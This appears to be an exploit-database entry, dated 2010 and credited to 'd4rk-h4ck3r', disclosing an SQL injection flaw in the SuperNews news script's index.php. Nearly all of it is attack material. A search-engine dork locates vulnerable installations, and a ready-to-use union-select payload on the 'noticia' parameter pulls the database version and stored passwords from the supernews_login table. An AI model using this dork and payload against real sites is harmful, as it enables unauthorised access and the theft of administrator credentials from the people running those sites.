id: 11456
date: 03/26/2010
title: SuperNews (index.php) SQL Injection Vulnerability
author: d4rk-h4ck3r
cves: 

=================================================
SuperNews (index.php) SQL Injection Vulnerability
=================================================


#############################################################
SuperNews (index.php) SQL Injection Vulnerability
#############################################################
###################################################
#[~] Author : d4rk-h4ck3r
#[~] Tunisian Security Team
###################################################
Dork:
inurl:/admin/adm_noticias.php
Exploit:
http://www.site.com/[path]/index.php?noticia=[SQLi]
PoC Demo:
index.php?noticia=null/**/union/**/all/**/select/**/1,2,3,4,@@version,pass,7/**/from/**/supernews_login
Greetz:Passeword & Maxilog & all vbspiders members
home page : http://www.dark-buy.com



#  0day.today [2023-03-25]  #